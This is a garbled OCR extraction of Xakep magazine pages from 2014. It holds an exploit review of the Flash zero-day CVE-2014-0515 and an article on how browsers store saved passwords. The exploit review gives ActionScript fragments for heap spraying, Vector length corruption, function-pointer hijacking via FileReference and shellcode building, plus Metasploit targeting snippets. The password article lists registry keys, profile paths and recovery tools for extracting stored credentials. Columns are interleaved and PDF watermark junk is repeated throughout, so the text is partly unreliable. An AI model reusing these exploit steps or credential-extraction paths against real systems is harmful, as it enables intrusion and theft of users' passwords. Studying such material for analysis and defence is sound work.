Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

186_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

25.1 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 5 6 78 / 158 9 10 11 12 13 14 15 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY	70 m
w Click				to
w Click
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Взлом

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
ХАКЕР 07 /186/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Борис Рютин, ЦОР b.ryutin@tzor.ru, @dukebarman

ŤŗŝŤŦ

ųŠŧťšŤşŨŤŘ

АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ

В новом обзоре мы с тобой рассмотрим одну (но какую!) уязвимость нулевого дня в старом добром Adobe Flash Player, которая не так давно была найдена in the wild. Первыми уязвимость нашли представители «темной стороны» и использовали ее, насколько было возможно. Давай разберемся, чем нас в очередной раз порадовала Адобе.

0DAY ťśŦśťŤšţśţŞśŗũŪśŦŖŘADOBE FLASH PLAYER ŘŠŤŢťŤţśţŨśPIXEL BENDER

CVSSv2: 10.0 (Av:R/Ac:L/A:N/C:C/I:C/A:C)

Дата релиза: 28 апреля 2014 года

Автор: неизвестен, @ohjeongwook CVE: 2014-0515

В середине апреля «Лаборатория Касперского» получила несколько Flashфайлов. Причем один из них был ранее задетектирован обычной эвристикой (удивительно, но кто-то до сих пор использует стандартные шелл-коды при атаках нулевого дня).

Уязвимость находится в обработчике компонента Pixel Bender. Помимо этого, он больше нигде не используется, но до сих пор поддерживается

в Flash Player. Как предполагают аналитики из ЛК, злоумышленники тем самым надеялись, что уязвимость в старом компоненте еще долго будет оставаться непропатченной.

Проанализировать вредоносный SWF-файл можно в SWF Investigator (bit. ly/1le4jTu) или SWFTools. SWF Investigator — официальная утилита от Adobe,

помогает быстро анализировать и выполнять небольшие куски ActionScriptкода. Это выручает, например, при восстановлении шелл-кода или другого зашифрованного SWF-файла в анализируемом. SWFTools же представляет собой просто набор консольных утилит для работы с SWF-файлами. В нашем случае мы будем использовать SWFDump.

После загрузки сэмпла обрати внимание на какие-то бинарные данные под тегом Definery Binary, это и есть атакующий набор данных.

Как и многие Flash-эксплойты, наш испытуемый начинается с технологии heap spray. Похожую ситуацию мы наблюдали в CVE-2014-1776 уязвимости для IE. В нашем случае эксплойт также использует тип данных Vector для получения контроля над областью памяти и данных, но есть несколько отличий.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to		ХАКЕР m				07 /186/ 2014
w Click						ХАКЕР m				07 /186/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Обзор эксплойтов

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
				to						m
w Click71										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

3			4

Во-первых, heap spray использует Vector.<int> с разме-		5
ром 0x22. Каждый Vector.<int> имеет следующий формат:
Vector size (4 ȕȔȝȦȔ) + extra header (4 ȕȔȝȦȔ) +
int (4 ȕȔȝȦȔ) array of 0x22
Код для выделения памяти размером 0x22 для массива			WARNING
Vector.<int>:			Вся информация пред-
var array_count:uint = 0x10000;			Вся информация пред-
var array_count:uint = 0x10000;			ставлена исключительно
var vector_size:uint = 0x22;			в ознакомительных
...			целях. Ни редакция,
var a:Array = new Array();			ни автор не несут от-
...			ветственности за любой
i = 0;			возможный вред, при-
while(i < array_count)			чиненный материалами
{			данной статьи.
a[i] = new Vector.<int>(vector_size);
i++;
}	пользования. Размер 0x88 выбран неслучайно — это очень		Рис. 1. Структура SWF-
	важно для успешной работы эксплойта.		файла с эксплойтом
Вектор становится элементом массива, и размер массива	Помимо создания heap spray дыр размером 0x88 байт, наш
становится равным 0x10000.	эксплойт пытается сделать больше дыр в других частях heap		Рис. 2. Область памяти
На рис. 2 видно, как выглядит память с heap spray. Элемен-	spray области. В результате некоторые Vector имеют длину		для Vector.<int>
ты Vector.<int> в основном находятся рядом и имеют размер	0x100:
0x90 (8 байт заголовок + 4 * 0x22 байта в int-массиве). Первые	var j:* = 0;		Рис. 3. Область памяти
четыре байта каждого элемента — это 0x22 в DWORD, который	var j:* = 0;		для Vector.<int> после
представлен в размере Vector.	...		сбрасывания длины
После того как мы сделали основу для heap spray, экс-	i = 512;		до 0
плойт пытается уменьшить размер каждого Vector до 0. Вну-	while(i < array_count)
тренняя логика Flash работает следующим образом. Она соз-	{		Рис. 4. Область памяти
дает дыры между каждым элементом. Вместо выделения	a[i - 2 * (j % 2)].length = 0x100;		перед увеличением
памяти для нового Vector-массива с размером 0 она снова	i = i + 28;		размера элементов
использует предыдущую область памяти, сбрасывая длину	j++;		массива
поля до 0.	}
Часть кода, которая устанавливает длину Vector равной 0:			Рис. 5. После увеличе-
i = 0	С помощью таких манипуляций мы переносим текущий		ния размера элементов
i = 0	массив из области, выделенной под heap spray, в другое ме-		массива
while(i < array_count)	сто.
{	На рис. 4 мы видим, как выглядит область памяти до того,
a[i].length = 0;	как мы пробуем создать «дыры». Когда дополнительные дыры
i++;	будут успешно созданы, некоторые части области кучи будут
}	выглядеть как на рис. 5.
	В результате мы освободим 0x118 байт в области памяти
В результате размер Vector уменьшится до 0 и каждый эле-	heap spray.
мент Vector-массива будет использовать только 8 байт памя-	Теперь рассмотрим ошибку в обработчике Pixel Bender.
ти, оставляя дополнительные 0x88 байт свободными для ис-	Если тестировать этот файл в дебаггере, то можно найти

hang

NOW!

BUY

w Click

-xcha

Взлом

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
ХАКЕР 07 /186/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to		ХАКЕР m				07 /186/ 2014
w Click						ХАКЕР m				07 /186/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Обзор эксплойтов

					hang		e
				C			e	E
			X					E
		-							d
	F									t
	D									i
	D									r
P							NOW!			o
P
						BUY
					to	BUY
w					to						m
w		73Click									m
w
	w									o
		.							.c
			p					g
				df			n		e
					-x cha

DWORD-значение на смещении 0xEA Pixel Bender, которое выступает триггером уязвимости.

Для того чтобы проанализировать, как эта область вызывает ошибку в коде обработчика Pixel Bender, воспользуемся утилитой dpbj (bit.ly/1sd3Eai), которая поможет отреверсить формат файла Pixel Bender. Автор также выложил исходный код этой программы, но нам будет достаточно исполняемого файла. Стоит заметить, что этот проект может очень помочь

висследовании, так как хорошая публичная документация по внутреннему формату Pixel Bender недоступна.

После того как мы загрузим данные, сразу поймем, где находится часть, которая вызывает падение (рис. 7).

Метаданные defaultValue должны быть только четырехбайтовыми, но этот код пытается конвертировать все 16 аргументов и поместить их в область памяти, тем самым вызывая ее повреждение.

На рис. 8 ты можешь увидеть, как метаданные sel instruction и defaultValue сохраняются. Оригинальные бинарные данные парсятся и транслируются в байт-код для дальнейшего использования в будущих операциях. Второе значение из defaultValue перезаписывает значения индекса в байт-коде sel instruction в памяти.

Код, перезаписывающий область sel instruction, представлен на рис. 9. FSTP-инструкция сохраняет значение в области памяти этого операнда. В нашем случае оригинальное значение 0x000B3880 после изменения сохраняется напрямую в 0x000B3880. Инструкция 0x167EC63 показывает, что память будет увеличена на 0x14. Первый элемент defaultValue находится внутри правильной области памяти, но значение из второго аргумента лежит внутри памяти sel instruction.

Помимо первого повреждения памяти для замещения других инструкций байт-кода, существует второе. Поврежденный байт-код интерпретируется и запускается. Сам же код, ответственный за интерпретацию байт-кода в опкод, представлен на рис. 10.

Вкоде на рис. 11 каждый операнд инструкции обрабатыва-

ется функцией set_array_value.

Теперь посмотри рис. 12. На нем представлен код, который повреждает память второй раз. Функция вызывается для каждой инструкции, и когда повреждение проходит успешно, то значение arg_index становится равным 0x000B3880, которое пришло из поврежденной области памяти. Значение индекса преобразовывается в смещение в памяти и используется позже, чтобы сохранить некоторые данные. Из инструкции 0x0167BC78, видим, что ecx указывает на структуру данных

впамяти, а edi — на смещение, высчитанное из arg_index. Значение регистра eax — это небольшой битовый трюк.

Значение возвращается из предыдущего вызова sub_1909EE0, которое возвращает указатель на память.

Но более интересные вещи происходят дальше. Из ecx (базовый указатель), edi (смещение) и eax (значение, которое меняется по ходу выполнения) атакующий может контролировать, конечно же, edi. Также, в результате использования описанной выше техники heap spray, большая часть памяти забита дырами размером 0x88. Структура данных, на которую указывает ecx, имеет размер меньше 0x88, и с большой вероятностью указатель будет указывать на одну из наших дыр в области heap spray. Поэтому в итоге атакующий может контролировать ecx и edi.

Но вот eax может быть случайным (хотя и правильным) местом памяти в куче. Атакующий не может контролировать его. Правда, в итоге атакующему это и не нужно. Eax всегда будет правильным указателем, но при этом его значение будет больше, чем диапазон значений (возможно, даже больше, чем 0x22+1). На рис. 13 показано, как выглядит память перед ее повреждением.

Далее ты можешь увидеть, что длина поля a[x+1] перезаписывается значением указателя. Значение может быть рандомным, но не больше, чем 0x22+1. Такая ситуация позволяет атакующему повредить длину поля следующего Vector.

Теперь значение ax+1 (.length имеет значительную величину. То есть, помимо возможности повредить дополнительные элементы Vector, это даст нам полный контроль над памятью процесса. Следующий код повредит длину поля Vector

до 0x40000001 (corrupt_index = x + 1):

var vector_size:uint = 0x22; a[corrupt_index][vector_size] = 0x40000001;

Теперь a[x+2].length становится равной 0x40000001.

На рис. 15 ты можешь увидеть этап, когда все дополнительные повреждения успешно закончились. В итоге из a[x+2] эксплойт может использовать произвольный индекс для доступа к любому месту памяти.

Эксплойт создает 64 FileReference объекты в куче.

var b:Array = new Array();

i = 0;

while(i < 64)

{

b[i] = new FileReference();

i++;

}

Далее ищем для каждого объекта FileReference из кучи место, подходящее нам, чтобы перезаписать указатель функции. Например, если мы запишем v = a[x+2], то адрес v[2] будет указателем функции. Область памяти вокруг этой ложной функции можно представить на ActionScript следующим образом:

var aaak:uint = this.aaal(v, opened_up_vector_pos);

var aaam:uint = this.read_memory(v,

opened_up_vector_pos, aaak + 32);

var aaao:Boolean = true;

var fake_func_ptr1:uint = 0;

var fake_func_ptr2:uint = 0;

if(aaao)

{

fake_func_ptr = this.search_fake_func_ptr

(v, opened_up_vector_pos);

fake_func_ptr1 = fake_func_ptr[0];

fake_func_ptr2 = fake_func_ptr[1];

shellcode_array =

this.allocate_vector_array_with_values

(0x45454545, 0x90909090);

shellcode_array_address =

this.search_vector_array

(v,opened_up_vector_pos, 0x46464646);

this.build_shellcode(shellcode_array,

shellcode_array_address,

ﬁle_reference_obj_addr);

v[7] = fake_func_ptr1 + 0;

v[4] = fake_func_ptr2;

v[0] = 4096;

v[1] = shellcode_array_address & 0xFFFFF000;

Теперь эксплойт может контролировать данные для указателей на объекты FileReference. Поиск нужного места ведется с помощью эвристического метода, и когда подходящее обнаруживается, то адрес с таблицей указателей заменяется на ложный. Полученная ложная таблица с аргументами представлена на рис. 17. v[7] становится указателем после вызова метода cancel. Код вызова метода довольно банален:

i = 0;

while (i < 64) {

b[i].cancel();

i++;

}

Дизассемблированный код, на который указывал аргумент v[7], представлен на рис. 18.

Эта функция использует аргументы из таблицы указателей. Eax указывает на местонахождение v2 ( после вызова. Инструкции 0x6EB8D5D8 и 0x6EBD5DB показывают, что использовались два аргумента из eax-8(v0 () и eax(v[1]), которые были интерпретированы как размер и адрес памяти.

Далее происходит вызов функции call_virtual_protect, что в конечном итоге вызовет VirtualProtect API и даст права на выполнение кода в нужной области памяти. Повторное ис-

Рис. 6. Начало Pixel Bender данных — триггера уязвимости

Рис. 7. Pixel Bender

код, вызывающий уязвимость

Рис. 8. Повреждение памяти

Рис. 9. Код для повреждения памяти

Рис. 10. Перевод байткода в опкод

Рис. 11. Код, устанавливающий значения регистров

Рис. 12. Код для второго повреждения памяти

Рис. 13. Базовый адрес, указывающий на одну из heap spray

дыр размером 0x88

Рис. 14. После повреждения памяти a[x+1 (.length будет равна большому значению

Рис. 15. Память после повреждения дополнительных длин полей

Vector

hang

NOW!

BUY

w Click

-xcha

Взлом

hang

NOW!

BUY

w Click

ХАКЕР 07 /186/ 2014

-x cha

Рис. 16. Модифи-	пользование кода из главного SWF-файла помогает нам обой-		Когда дополнительные методы cancel будут вызваны, наша
цирование объекта	ти DEP.		ложная таблица будет выглядеть примерно так (см. рис. 20).
FileReference	Так как описанные выше манипуляции в итоге помогают		Адрес, указанный с помощью v[7], будет уже с правами на вы-
	нам обойти ASLR-защиту, а DEP изменяет права в отведенной		полнение, установленными с помощью предыдущего вызова
Рис. 17. Ложная табли-	памяти, дальнейшее выполнение нужного нам произвольного		метода cancel, который уже и вызывал VirtualProtect.
ца FileReference	кода не вызывает трудностей.		Готовый эксплойт доступен в виде модуля для Metasploit.
	EXPLOIT		Кстати, с января этого года разработчики переделали модель
Рис. 18. Код, на ко-	EXPLOIT		использования эксплойтов, атакующих через браузер, с чем
торый указывает	Для начала наш эксплойт создает шелл-код и изменяет v[7]		я и столкнулся, когда портировал свой модуль для уязви-
аргумент v[7]	так, чтобы он указывал на адрес полученного шелл-кода.		мости в том же Flash Player 2013-0634, о котором мы писали
	function build_shellcode(param1:Array,		в одном из номеров. Например, требование модуля для Flash-
Рис. 19. Код внутри	function build_shellcode(param1:Array,		эксплойтов будет выглядеть так:
функции call_virtual_	param2:uint, param3:uint) : * {
protect	var _loc4_:uint = 0;		'BrowserRequirements' =>
	while (_loc4_ < param1.length) {	{
Рис. 20. Замена v[7]	param1[_loc4_][2] = 1458342741;		:source => /script\|headers/i,
	param1[_loc4_][3] = 275272535;		:clsid => "{D27CDB6E-AE6D-11cf-96B8-
	param1[_loc4_][4] = 3.905129185E9;	444553540000}",
	param1[_loc4_][5] = 75;		:method => "LoadMovie",
	param1[_loc4_][6] = 3.113259152E9;		:os_name => Msf::OperatingSystems::WINDOWS,
	param1[_loc4_][7] = param2;		:ua_name => Msf::HttpClients::IE,
	param1[_loc4_][8] = 4.230239373E9;		:ﬂash => lambda { \|ver\| ver =~ /^11\.5/ &&
	param1[_loc4_][9] = 1749051985;		ver < '11.5.502.149' }
	param1[_loc4_][10] = 4096;	},
	param1[_loc4_][11] = 1758527313;

param1[_loc4_][12] = 3.847464024E9;

param1[_loc4_][13] = 10984;

param1[_loc4_][14] = 3.197145088E9;

param1[_loc4_][15] = param3;

param1[_loc4_][16] = 1749052048;

Следующий код заменяет указатель функции для метода cancel внутри ложного объекта FileReference и запускает его.

Или IE с библиотеками определенных версий:

'BrowserRequirements' =>

{

:source => /script/i,

:os_name => OperatingSystems::WINDOWS,

:ua_name => HttpClients::IE,

:ua_ver => "9.0",

:os_ﬂavor => "7",

v[7] = shellcode_array_address;			:java => /1\.6\|6\.0/,
i = 0;			:mshtml_build => lambda { \|ver\| ver.to_i.
while (i < 64) {			between?(16446, 16490) } # May 17 mshtml to
b[i].cancel();			MS13-Jun
i++;		},
}
			И это лишь одно из нововведений браузерных эксплойтов
	20		от известного фреймворка.

TARGETS

Проверено на:

•	13.0.0.206;
•	11.2.202.356;
•	11.7.700.279.

SOLUTION

Есть исправление от производителя.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ФОКУС

ГРУППА

? Влиять

журнала

любимого

.ru

.xakep

в жизнивозможностьgroup

участие

на

? Не

упускай

активное

группы

Хакера

завтра

принимать

фокус

будет

Хакер

Хочешь

участник

, каким

как

на то

Регистрируйся

возможность

;

уникальная

статьях

появится

опубликованных

у тебя

об

;

журнала

для

После этого свое

мнение

темы

• высказать

новые на

косяки

• предложить

внимание

• обратить

СООБЩЕСТВА

НЕ

ТОРМОЗИ

][!

ЧАСТЬЮ

СТАНЬ

ЧАСТЬЮ

СТАНЬ

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY	76 m
w Click				to
w Click
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Взлом

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
ХАКЕР 07 /186/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to		ХАКЕР m				07 /186/ 2014
w Click						ХАКЕР m				07 /186/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

Хранители секретов

					hang		e
				C			e	E
			X					E
		-							d
	F									t
	D									i
	D									r
P							NOW!			o
P
						BUY
					to	BUY
w					to						m
w		77Click									m
w
	w									o
		.							.c
			p					g
				df			n		e
					-x cha

ūŦŖţŞŨśšŞŧśŠŦśŨŤŘ

КАК СОВРЕМЕННЫЕ БРАУЗЕРЫ ЗАЩИЩАЮТ ТВОИ ПЕРСОНАЛЬНЫЕ ДАННЫЕ

Популярные браузеры позволяют хранить логины пользователя и пароли, которыми он пользуется на сайтах, а затем автоматически заполнять соответствующие поля при посещении сайтов. Хотя браузеры сохраняют эти учетные данные в зашифрованном виде, злоумышленник, получивший доступ к компьютеру, все равно сможет их прочитать и использовать. Давай рассмотрим алгоритмы хранения паролей, способы их взлома и методы защиты.

ПРОБЛЕМАОДНОГОПАРОЛЯ				5.	Сохраняем в реестре RecordKeyCrc + RecordKey +
Чаще всего для аутентификации пользователя на том или					EncryptedData.
ином онлайн-сервисе применяется пара логин-пароль, при-				6.	«Забываем» EncryptionKey.
чем пароль должен быть достаточно стойким к взлому (сле-
довательно, сложным). Чем больше сервисов, тем больше					Алгоритм расшифровки выглядит следующим образом:
паролей приходится запоминать. Поэтому многие используют				1.	При посещении сайта берем его адрес (EncryptionKey)	Сергей Сторчак
один и тот же пароль для различных аккаунтов. Как правило,					и получаем ключ записи RecordKey = SHA(EncryptionKey).	ser-storchak@mail.ru
злоумышленники, заполучив твой пароль на одном сайте, пы-				2. Проходим по списку всех ключей записи в поиске RecordKey.
таются использовать его на других твоих аккаунтах. Для ре-					Если RecordKey найден, расшифровываем данные, которые
шения данной проблемы и придумали менеджеры паролей,					хранятся вместе с этим ключом, с помощью EncryptionKey.
которые умеют не только безопасно хранить учетные данные					Data = DPAPI_Decrypt(EncryptedData, EncryptionKey).
и генерировать стойкие пароли, но и автоматически заполнять
соответствующие поля данными для аутентификации при сле-					Шифрование учетных данных HTTP-аутентификации вы-
дующем посещении сайтов и онлайн-сервисов. Большинство				полняется с помощью службы Vault. Данная служба была до-
современных браузеров имеют собственные менеджеры па-				бавлена в Windows 7 и пришла на смену устаревшему храните-
ролей, и, соответственно, алгоритмы хранения паролей у каж-				лю учетных данных пользователя Credential Manager, который
дого браузера различные. Об этом мы и поговорим.				был в предыдущих версиях ОС от Microsoft. Принцип ее ра-
IE10,11				боты схож с Gnome Key Ring в Linux или Apple Keychain в Mac
IE10,11				OS. Она позволяет хранить три типа паролей: учетные данные
Начиная с Internet Explorer версии 7.0 Microsoft полностью				Windows (Windows Credentials), учетные данные на основе сер-		Хранилище Windows
изменила способ хранения паролей. В предыдущих верси-
ях (4.0–6.0) все пароли хранились в разделе реестра, име-
нуемом Protected Storage System Provider (PStore). Теперь
пароли хранятся в разных местах в зависимости от типа па-
роля. Существует два типа паролей: пароли автозаполнения
(AutoComplete) и пароли HTTP-аутентификации.
Пароли автозаполнения хранятся в HKEY_CURRENT_USER\
Software\Microsoft\Internet	Explorer\IntelliForms\
Storage2 разделе реестра. Здесь каждая запись соответству-
ет хешу сайта, на котором логин и пароль были сохранены.
Данные попадают в реестр сразу после того, как пользователь
ответит согласием на предложение браузера сохранить его
credentials. Поскольку адрес сайта используется для создания
ключа шифрования, учетные данные возможно восстановить,
только если адрес сайта есть в истории просмотра браузера.
Если в IE очистить историю просмотра, выполнить восстанов-
ление данных будет невозможно до тех пор, пока снова не по-
сетишь сайт, на котором они сохранялись.
Рассмотрим упрощенный алгоритм работы IE11 при сохра-
нении учетных данных с помощью автозаполнения:
1. Сохраняем адрес сайта, который		в дальнейшем	бу-
дет использоваться в качестве		ключа шифрования
(EncryptionKey).
2. Получаем ключ записи (RecordKey), где RecordKey			=
SHA(EncryptionKey).

3.Подсчитываем контрольную сумму RecordKey для проверки целостности ключа записи (целостность самих данных нам будет гарантировать DPAPI) RecordKeyCrc = CRC(RecordKey).

4.Шифруем данные ключом шифрования EncryptedData = DPAPI_Encrypt(Data, EncryptionKey).

hang

NOW!

BUY

w Click

-xcha

Взлом

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
ХАКЕР 07 /186/ 2014
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

			бальный уникальный идентификатор хранилища. В пере-
			численных выше каталогах лежат следующие файлы (файлы
			создаются только после того, как пользователь сохранит свои
			учетные данные):
			• Policy.vpol — набор ключей шифрования, которые исполь-
				зуются для защиты пользовательской информации. Дан-
				ные ключи могут быть защищены с помощью DPAPI (Data
				Protection API) либо с помощью пароля пользователя (не ис-
				пользуется в Windows 8). Алгоритм для защиты паролей —
				PBKDF2 (Password-Based Key Derivation Function);
			• <GUID_ȩȤȔȡȜȟȜȭȔ>.vsch — содержит схему или описание
				данных для учетных данных, находящихся в хранилище;
			• <GUID_ȩȤȔȡȜȟȜȭȔ>.vcrd — содержит учетные данные поль-
				зователя (пароли и прочее), зашифрованные с помощью
				алгоритма AES. Ключ шифрования берется из Policy.vpol;
				в каждой записи при шифровании используется соль.
				Если необходимо избавиться от всех сохраненных учетных
			данных, можно просто удалить эти файлы в указанных дирек-
			ториях.
			FIREFOX30
			В	Firefox хранить учетные данные пользователя помогает
			«Менеджер паролей». Всякий раз, когда пользователь вво-
			дит логин и пароль в форму на каком-либо сайте, менеджер
			предлагает запомнить учетные данные, и если пользователь
			соглашается, то имя пользователя и пароль будут храниться
			во внутренней базе данных авторизации. Поэтому в следу-
			ющий раз и далее всякий раз, когда пользователь посещает
			сайт, он сможет автоматически вставлять в поля авторизации
			сохраненные учетные данные, что позволяет сэкономить вре-
			мя на вводе данной информации. В то же время пользователь
тификата (Certificate-Based Credentials) и общие учетные дан-		Установка мастер-па-	может выбрать никогда не хранить учетные данные для кон-
ные (Generic Credentials).		роля в Firefox	кретного сайта. В таком случае сайт добавляется в список
	В учетных данных Windows можно хранить имена пользова-		исключений, и менеджер паролей никогда больше не будет
телей и пароли, используемые для входа на сетевые ресурсы,			докучать юзеру предложениями сохранить его логин/пароль
подключения к удаленному рабочему столу (терминальный			для данного конкретного сайта. Кстати, начиная с версии 27
сервер) и на сайты (встроенная аутентификация Windows —			в огнелисе реализовали поддержку полей ввода пароля, сге-
Integrated Windows Authentication, IWA). К последним относят-			нерированных скриптами.
ся и пароли HTTP-аутентификации. Учетные данные Windows				В папке, где хранится профиль пользователя, после запол-
Vault хранятся на компьютере в папках, называемых хранили-			нения HTML-формы учетными данными и нажатия кнопки «За-
щами. Сама система Windows и прикладные программы (такие			помнить пароль» создаются файлы key.db, key3.db и signons.
как браузеры) могут безопасно передавать учетные данные			sqlite. Как ты помнишь, профиль пользователя находится
в хранилищах другим компьютерам и сайтам. Файлы службы			•	в Windows 7: %userproﬁle%\Application Data\Mozilla\
Vault расположены в папке профиля пользователя:				Firefox\Proﬁles\UID.default\;
C:/Users/<USER_NAME>/AppData/Local/Microsoft/			• в Linux: ~/.mozilla/ﬁrefox/UID.default/,
C:/Users/<USER_NAME>/AppData/Local/Microsoft/
Vault/<GUID_ȩȤȔȡȜȟȜȭȔ>			где %userproﬁle% — переменная окружения в Windows, в ко-
			торой хранится путь к домашней директории пользователя,
и			а UID — восьмисимвольный уникальный идентификатор, кото-
Ǳ:/Users/<USER_NAME>/AppData/Roaming/Microsoft/			рый генерируется случайным образом при первом использо-
Ǳ:/Users/<USER_NAME>/AppData/Roaming/Microsoft/			вании браузера.
Vault/<GUID_ȩȤȔȡȜȟȜȭȔ>				Файл key.db используется для создания файла signons.
			sqlite и его последующей расшифровки. В самом же
(если компьютер — элемент домена Active Directory), где			signons.sqlite хранятся имена пользователей, пароли,
<USER_NAME> — имя пользователя, <GUID_ȩȤȔȡȜȟȜȭȔ> — гло-			адреса сайтов, где были сохранены эти данные, и исключе-
			ния для сайтов, для которых выбрано «Никогда не сохранять
			пароль». Эти данные шифруются с помощью ключа Triple DES
			(CBC mode) и кодируются алгоритмом Base64. Ключ хранится
			в файле key3.db. Адреса сайтов не шифруются, поскольку они
ŚŤŘśŦŵş, ţŤ ťŦŤŘśŦŵş			используются в качестве ключей для поиска учетных данных:
ŚŤŘśŦŵş, ţŤ ťŦŤŘśŦŵş			когда менеджеру паролей браузера необходимо автоматиче-
			когда менеджеру паролей браузера необходимо автоматиче-
			ски заполнить веб-форму на сайте, он ищет соответствующий
			URL в файле signons.sqlite, и, если URL найден, происходит
Хочется отдельно упомянуть, что установленные до-			автоматическое заполнение веб-формы данными для автори-
полнения и плагины также могут воровать сохранен-			зации.
ную в менеджере паролей информацию, поскольку		WARNING	GOOGLECHROME35ИOPERA21
они имеют полный доступ к любым данным браузера.		WARNING	GOOGLECHROME35ИOPERA21
Поэтому рекомендуется устанавливать дополнения		Внимание! Инфор-	Браузеры Google Chrome и Opera разработаны на основе сво-
только с официальных сайтов, которые будут прове-		Внимание! Инфор-	бодного браузера Chromium и движка Blink, поэтому алгоритм
рены разработчиками конкретного браузера:		мация представлена	хранения паролей у них схож. Они, так же как и огнелис, имеют
•	Firefox: https://addons.mozilla.org/ru/firefox/;	исключительно с целью	встроенный менеджер паролей. Как и в случае с Firefox, здесь
•	Opera: https://addons.opera.com/ru/extensions/;	ознакомления! Ни авто-	также используется формат баз данных SQLite. При подтверж-
•	Chrome: https://chrome.google.com/webstore/	ры, ни редакция за твои	дении сохранения пароля на сайте информация сохраняется
	category/extensions;	действия ответственно-	в таблице logins в файле базы данных Login Data, лежа-
•	IE: www.iegallery.com/Addons.	сти не несут!	щем в папке профиля пользователя (для хрома это директо-

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to		ХАКЕР m				07 /186/ 2014	Хранители секретов
w Click						ХАКЕР m				07 /186/ 2014	Хранители секретов
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ũŨŞšŞŨű

Существует ряд утилит, позволяющих восстанавливать сохраненные в браузерах данные авторизации. Их список довольно внушителен, поэтому приведу лишь несколько:

•IE PassView (goo.gl/xygiqX) — компактная утилита управления паролями, хранимыми в Internet Explorer, поддерживает все версии IE. Утилита выводит следующую информацию: адрес сайта, тип пароля (автозаполнение, защищенный паролем сайт или FTP), место хранения (реестр, Credentials File и Protected Storage), имя пользователя и его пароль.

•Windows Vault Password Decryptor (goo.gl/ sbiFM6) — утилита для быстрого восстановления сохраненных паролей в Windows Credential Manager.

•Firefox Password Remover (goo.gl/iuPUDr) — ути-

лита для просмотра информации, сохраненной

вменеджере паролей, и ее удаления.

•WebBrowserPassView (goo.gl/tVgvxR) — инстру-

мент для восстановления паролей, сохраненных

вследующих браузерах: IE, Firefox, Chrome, Safari и Opera.

•Browser Password Decryptor (goo.gl/yVvmWZ) —

восстанавливает хранимые данные авторизации пользователя в следующих браузерах: Firefox, IE, Chrome, CoolNovo Browser, Opera, Safari, Comodo Dragon, SeaMonkey и Flock.

Следует отметить, что пользователь с правами администратора может восстановить все пароли из менеджера паролей, остальные пользователи — только свои данные.

рия \Users\<username>\Appdata\Local\Google\Chrome\User Data\Default\, для Оперы — \Users\<username>\AppData\

Roaming\Opera Software\Opera Stable\). Можешь исполь-

зовать любой редактор SQLite (например, SQLite Database Browser, goo.gl/tMn2cH) для просмотра содержимого этого файла.

Сама таблица logins состоит из 17 столбцов, из них наибольший интерес представляют только восемь:

•Origin_URL — основной адрес сайта;

•Action_URL — адрес сайта, включающий путь до скрипта авторизации;

•Username_element — название поля имени на сайте;

•Username_value — фактическое имя пользователя (логин);

•Password_element — название поля пароля на сайте;

•Password_value — пароль;

•Date_created — дата и время создания (сохранения) записи в формате UNIX;

•Blacklisted_by_user — равно 1 или 0, в зависимости, от того находится сайт в черном списке или нет.

Кроме поля password_value, все перечисленные поля хранят данные в открытом виде. Пароль шифруется с помощью DPAPI, а это означает, что в случае кражи файла с паролями они не смогут быть расшифрованы на другом компьютере (только на том же самом).

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
				to						m
w79Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

